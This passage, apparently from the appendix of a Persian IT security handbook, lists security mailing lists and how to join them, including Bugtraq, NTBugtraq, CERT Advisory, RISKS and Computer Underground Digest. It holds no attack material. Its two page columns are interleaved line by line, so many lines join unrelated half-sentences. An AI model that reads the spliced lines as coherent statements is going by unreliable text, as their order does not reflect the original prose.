‫ﺗﺮﻙ ﻛﻨﺪ ﻳﺎ ﺑﻪ ﻣﺴﺎﻓﺮﺕ ﺑﺮﻭﺩ‪ ،‬ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺗـﺎ‬
‫ﺍﺷﺨﺎﺹ ﺑﻪ ﻗﻮﻝ ﺧﻮﺩ ﻣﺘﺨﺼﺼﻲ ﺩﺭ ﺷـﺒﻜﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ‬
‫ﻛﺎﺭﻫﺎﻱ ﺍﻭ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﺑﺮﺍﺯ ﻋﻘﺎﻳﺪ ﺩﺭﺳﺖ ﻳﺎ ﻏﻠﻂ ﺧﻮﺩ ﻟﺤﻈﻪﺍﻱ ﺗﺄﻣﻞ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
‫ﻻ ﺑﻲﺧﻄـﺮ‬ ‫ﺍﮔﺮﭼﻪ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻦ ﻗﺒﻴﻞ ﺍﻓﺮﺍﺩ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﭘﻴﺎﻣﻬـﺎ ﺩﺭ ﻣﻴـﺎﻥ ﮔـﺮﻭﻩﻫـﺎﻱ ﺧﺒـﺮﻱ‬


‫ﺷﺒﻜﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﺨﺼﻮﺹ ﺍﻳﻨﻜﺎﺭ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ‬ ‫ﺍﺳﺖ؛ ﺍﻣﺎ ﮔﺎﻫﻲ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺩﺳﺮﺳﺎﺯ ﺷﻮﺩ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‬
‫ﺷــﻤﺎ ﺭﺍ ﻗــﺎﺩﺭ ﻣــﻲﺳــﺎﺯﺩ ﻛــﻪ ﭘﻴﺎﻣﻬــﺎ ﺭﺍ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻳــﻚ‬ ‫ﮔﺎﻫﻲ ﺍﻓﺮﺍﺩﻱ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻫﺪﺍﻑ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺩﺍﺭﻧـﺪ‪ ،‬ﻭ ﻳـﺎ‬
‫‪ newsreader‬ﭘﻴﺸﺮﻓﺘﻪ ﺑﺨﻮﺍﻧﻴﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ‪ ،‬ﻣﺠﻤﻮﻋﻪ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﹰﺎ ﻣﺘﺨﺼﺼﺎﻥ ﻧﻴﺰ ﺩﺭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻧﻮﺷﺘﺎﺭﻱ ﻛـﻪ‬
‫ﭘﻴﺎﻣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻛﻠﻤﺔ ﻛﻠﻴﺪﻱ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻭ ﻣﻨﺘﺨـﺐ ﺷـﻤﺎ‬ ‫ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷﻮﻧﺪ‪.‬‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٨٠‬‬

‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺁﻧﻬﺎ )ﮔﺮﭼﻪ ﻫﺪﻑ ﺑﻴﺸﺘﺮ ﺍﻋﻀﺎﻱ ﺁﻥ‬ ‫ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺑﺎﻳﮕﺎﻧﻲ‪،‬‬
‫ﻫﻤﻴﻦ ﺍﻣﺮ ﺍﺳﺖ(‪ .‬ﺑﺮﺍﻱ ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﺯﻫﺎ ﻭ ﻫﻔﺘﻪﻫﺎ )ﻭ ﻳﺎ ﺣﺘﻲ ﺯﻣﺎﻥ‬
‫ﺑــــﻪ ﭘﺎﻳﮕــــﺎﻩ ﻭﺏ ‪http://www.securityfocus.com‬‬ ‫ﺑﻴﺸﺘﺮﻱ( ﻧﮕﻪ ﺩﺍﺭﻳﺪ‪.‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻣـﺎ ﻧﻜـﺎﺕ‬
‫ﻧﺎﺻﺤﻴﺢ ﻭ ﻧﺎﺩﺭﺳـﺘﻲ ﺭﺍ ﻧﻴـﺰ ﺩﻳـﺪﻩ ﻭ ﺷـﻨﻴﺪﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ‬ ‫ﺑﺎﻻﺧﺮﻩ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺍﻣﻜـﺎﻥ‬
‫ﻓﻬﺮﺳﺖ ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻣﺎﺩﻩﺍﻧﺪ ﺍﺷﺘﺒﺎﻫﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ‬ ‫ﻋﻀﻮﻳﺖ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺭﻭﺯﺍﻧﺔ ﺧﻼﺻـﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﻧﻴـﺰ‬
‫ﻻ ﻋﻼﻗـﺔ‬ ‫ﭘﺴﺖﺷﺪﻩ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﺭﺍ ﻛـﺸﻒ ﻛﻨﻨـﺪ ﻣﻌﻤـﻮ ﹰ‬ ‫ﻻ ﻫﺮ ﺭﻭﺯ ﻳـﻚ ﭘﻴـﺎﻡ‬ ‫ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺍﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻋﻀﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺧﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻫﻮﻳﺖ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻓﺎﺵ ﻧﻜﻨﻨﺪ‪ .‬ﺍﮔﺮ ﻧﮕـﺮﺍﻥ‬ ‫ﻭﺍﺣﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬـﺎﻱ ﺁﻥ ﺭﻭﺯ‬
‫ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ‪ ،‬ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﭘﻴـﺎﻡ‬ ‫ﺭﺍ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ‪ .‬ﻣﺪﻳﺮﻳﺖ ﺍﻳﻦ ﭼﻜﻴﺪﻩﻫﺎ ﺑﺴﻴﺎﺭ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺗﻔﻜﻴـﻚ‬
‫ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﺭﻭﺯﺍﻧﺔ ﻣﺠﺰﺍ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﻧﻘﺎﻁ ﺿﻌﻒ ﭘﻲ ﺑﺒﺮﻳﺪ ﻛﻪ ﺳﺎﻳﺮ ﺭﺍﻫﺒﺮﺍﻥ ﻭ ﻣﻬﺎﺟﻤﺎﻥ‬
‫‪ SecurityFocus‬ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ ﺩﺍﺭﺩ ﻛـﻪ‬ ‫ﺳﻴﺴﺘﻢ ﺍﺯ ﺳﺎﻋﺘﻬﺎ ﻗﺒﻞ ﺍﺯ ﺁﻥ ﺑﻪ ﺁﻧﻬﺎ ﻭﺍﻗﻒ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ )ﻣﺜﻞ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ‪ ،‬ﻛﻮﺯﻩﻫﺎﻱ ﻋﺴﻞ‪ ،‬ﺍﻧـﻮﺍﻉ‬
‫ﻭﻳﺮﻭﺳﻬﺎ( ﻭ ﻳﺎ ﺍﻧﻮﺍﻉ ﺧـﺎﺹ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪) Unix‬ﻣﺜـﻞ ‪ Linux‬ﻳـﺎ‬ ‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﻣﻌﺘﺒﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ (Sun‬ﻣﻲﺷﻮﺩ‪ .‬ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺟﺬﺍﺏ‪ ،‬ﻓﻬﺮﺳـﺖ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻧﺘـﺸﺎﺭ‬
‫ﭘﺴﺘﻲ "ﺭﺧﺪﺍﺩﻫﺎ" )‪ (incidents‬ﺍﺳـﺖ ﻛـﻪ ﻣﺨـﺼﻮﺹ ﮔـﺰﺍﺭﺵ‬
‫ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﻭ ﻫــﺸﺪﺍﺭﻫﺎﻱ ﺧــﻮﺩ ﻓﻬﺮﺳــﺘﻬﺎﻱ ﭘــﺴﺘﻲ ﺩﺍﺭﻧــﺪ‪.‬‬
‫ﺣﻤﻼﺕ ﻭ ﻧﻔﻮﺫﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺑﺎﺷـﺪ؛ ﻛـﻪ ﺑـﻪ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺘـﺸﺎﺭ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ ﺍﺭﺍﺋـﻪ‬
‫ﺷﺮﻛﺖ ‪ Symantec‬ﺗﻌﻠﻖ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﺸﺎﻭﺭﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﺩﺍﺭﻧـﺪ‪،‬‬
‫‪NTBugtraq‬‬ ‫ﻣﺜــﻞ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ‪ ،‬ﻭ‬
‫ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺑﺪﻭﻥ ﺳﺮﺩﺑﻴﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑـﺮﺍﻱ‬ ‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ )ﺷﺎﻣﻞ ﺑﺮﺧﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪) Windows NT‬ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫﺎﻱ ‪2000‬‬ ‫ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ(‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ‬
‫ﻭ ‪ .(XP‬ﻣﺒﺎﺣﺚ ﻏﻴﺮ ﻣﺮﺗﺒﻂ ﺑﺎ ‪ NT‬ﺟﺰﺀ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻳﻦ ﻓﻬﺮﺳﺖ‬ ‫ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻓﻬﺮﺳـﺘﻲ‪ ،‬ﺑـﻪ‬
‫ﭘﺴﺘﻲ ﻧﻤﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛـﻪ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺍﺯ‬ ‫ﺁﻥ ﻣﻠﺤﻖ ﺷﻮﻳﺪ‪ .‬ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﻓﻬﺮﺳـﺖ‬
‫ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺑﻪ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ‪ Bugtraq‬ﺷﺒﻴﻪ ﺍﺳﺖ‪ .‬ﺑـﺮﺍﻱ‬ ‫ﭘﺴﺘﻲ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ،‬ﻛﺎﻓﻲ ﺍﺳﺖ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳـﺮ‬
‫ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ‬ ‫ﻣﺮﺍﺟﻌﻪ ﻭ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻧﺎﻡ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬ ‫‪http://register.microsoft.com/regsys/pic.asp‬‬
‫‪http://www.ntbugtraq.com‬‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﻬﻢ‬
‫‪CERT Advisory‬‬ ‫ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﻪ ﭼﻨﺪ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻬﻢ ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺗﻮﺻـــﻴﻪﻫـــﺎﻱ ﺟﺪﻳـــﺪ ﻣﺮﻛـــﺰ ﻫﻤﺎﻫﻨﮕﻴﻬـــﺎﻱ ‪CERT‬‬
‫)‪ (CERT/CC‬ﺩﺭ ﻣــﻮﺭﺩ ﺍﺷــﻜﺎﻻﺕ ﻭ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‬ ‫‪Bugtraq‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺩﺭﺝ ﻣـﻲﺷـﻮﺩ‪.‬‬ ‫ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺑﺪﻭﻥ ﺳﺮﺩﺑﻴﺮ )ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﺄﻳﻴﺪ‬
‫ﻻ‬
‫ﻣﻄﺎﻟﻌﻪ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺗﺎ ﺣﺪﻱ ﺧﺴﺘﻪﻛﻨﻨﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻌﻤﻮ ﹰ‬ ‫ﺳﺮﺩﺑﻴﺮ ﻧﺪﺍﺭﺩ( ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ‬
‫ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺁﻥ ﺁﻧﻘﺪﺭ ﺟﺰﺋﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﻤـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺁﺳـﺎﻧﻲ‬ ‫ﭘــﺴﺘﻲ ﻣﺒﺎﺣــﺎﺙ ﻣــﺸﺮﻭﺡ ﺩﺭ ﺧــﺼﻮﺹ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‬
‫ﻫﺪﻑ ﺁﻧﻬﺎ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻫﻢ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Unix‬ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪ :‬ﺭﺧﻨﻪﻫﺎ ﭼﻪ ﻫﺴﺘﻨﺪ‪ ،‬ﭼﮕﻮﻧـﻪ‬
‫ﻣﺰﺍﻳﺎﻱ ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﺮﺩ‪ ،‬ﻭ ﺑﺎ ﭼﻪ ﺭﻭﺷﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬـﺎ‬
‫ﭘﺴﺘﻲ‪ ،‬ﺩﺭﺧﻮﺍﺳﺖ ﻋﻀﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫ﺭﺍ ﺍﺻﻼﺡ ﻧﻤﻮﺩ‪ .‬ﻫـﺪﻑ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺷـﺎﻣﻞ ﺗﻌﺮﻳـﻒ‪،‬‬
‫‪ majordomo@cert.org‬ﺑﻔﺮﺳــﺘﻴﺪ ﻭ ﺩﺭ ﻣــﺘﻦ ﭘﻴــﺎﻡ ﺧــﻮﺩ‬ ‫ﺗﺸﺨﻴﺺ‪ ،‬ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔـﺮﻓﺘﻦ‬
‫ﻋﺒﺎﺭﺕ "‪ "subscribe cert-advisory‬ﺭﺍ ﻗﻴﺪ ﻛﻨﻴﺪ‪.‬‬ ‫ﻣﺸﻜﻼﺕ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﻭ ﻧﻪ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻳـﺎ‬
‫‪٤٨١‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﺷﺒﻜﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺔ ﺑﺎﻳﮕﺎﻧﻲ ﻭ ﻳﺎ ﻋـﻀﻮﻳﺖ‬ ‫ﺑﺎﻳﮕﺎﻧﻲ ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳـﺮ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﺑﺮﻭﻳﺪ‪:‬‬ ‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪http://honor.icsalabs.com/mailman/listinfo/fir‬‬ ‫‪http://www.cert.org/nav/alerts.html‬‬
‫‪ewall-wizards‬‬
‫‪Computer Underground Digest‬‬
‫‪RISKS‬‬ ‫ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻧــﺎﺩﺭ ﺍﺯ ﺗﻮﺻــﻴﻪﻫــﺎﻱ ﺍﺭﺳــﺎﻟﻲ ﺩﺭ ﺧــﺼﻮﺹ‬
‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺍﺯ ﻟﺤـﺎﻅ ﺭﺳـﻤﻲ ﺑﻌﻨـﻮﺍﻥ ﺍﺗـﺎﻕ ﮔﻔﺘﮕـﻮﻱ‬ ‫ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﺍﻣﻨﻴﺖ‪ ،‬ﻗـﺎﻧﻮﻥ‪ ،‬ﻭ ﺍﻃﻼﻋـﺎﺕ ﺯﻳﺮﺯﻣﻴﻨـﻲ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪.‬‬
‫ﻣﺆﺳــﺴﻪ ‪ ACM‬ﺩﺭﺧــﺼﻮﺹ ﻣﺨــﺎﻃﺮﺍﺕ ﻛــﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ‬ ‫ﺑﺮﺧﻼﻑ ﻧﺎﻡ ﺁﻥ‪ ،‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺩﺍﺭﺍﻱ ﻣﻄﺎﻟﺐ "ﺯﻳﺮﺯﻣﻴﻨﻲ" ﻧﻴﺴﺖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺩﺭ‬ ‫‪ -‬ﺑﻠﻜﻪ ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﻴﻂ ﭘﻴﺮﺍﻣـﻮﻧﻲ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ ﻧﻴـﺎﺯ ﺑـﻪ ﺗﺄﻳﻴـﺪ ﺳـﺮﺩﺑﻴﺮ ﺁﻥ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺁﻥ‬ ‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺩﺭ ﺳﺎﻝ‪ ۲۰۰۰‬ﻓﻌﺎﻟﻴﺖ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ‬
‫ﻣﺒﺎﺣﺜﻲ ﺩﺭﺧﺼﻮﺹ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺷـﺪﻥ‬ ‫ﻣﺘﻮﻗﻒ ﺷﺪ ﻭ ﻫﻨﻮﺯ ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﻣﺠـﺪﺩﹰﺍ ﻓﻌﺎﻟﻴـﺖ‬
‫ﺑﺮﺍﻱ ﺟﻮﺍﻣﻊ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ ﻋﻨﻮﺍﻥ ﻣﻲﮔﺮﺩﺩ‪ .‬ﭘﻴﺎﻣﻬﺎﻱ ﺍﻳﻦ ﻓﻬﺮﺳﺖ‬ ‫ﺁﻥ ﺁﻏﺎﺯ ﺷﻮﺩ ﻳﺎ ﻧﻪ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺩﺭ ﻗﺎﻟﺐ ﮔـﺮﻭﻩ ﺧﺒـﺮﻱ‬
‫ﭘﺴﺘﻲ ﺩﺭ ﮔﺮﻭﻩ ﺧﺒﺮﻱ ‪ comp.risks‬ﻧﻴﺰ ﻣﻨﺘـﺸﺮ ﻣـﻲﺷـﻮﺩ ﻭ‬ ‫‪ comp.society.cu-digest‬ﺩﺭ ‪ Usenet‬ﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻭ‬
‫ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻩ ﺧﺒﺮﻱ ﺭﺍﻩ ﺑﻬﺘﺮﻱ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻣﻬﺎﻱ‬ ‫ﮔﺮﻭﻩ ﺧﺒﺮﻱ ﺑﻬﺘﺮﻳﻦ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺁﻥ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﺩﺭ‬
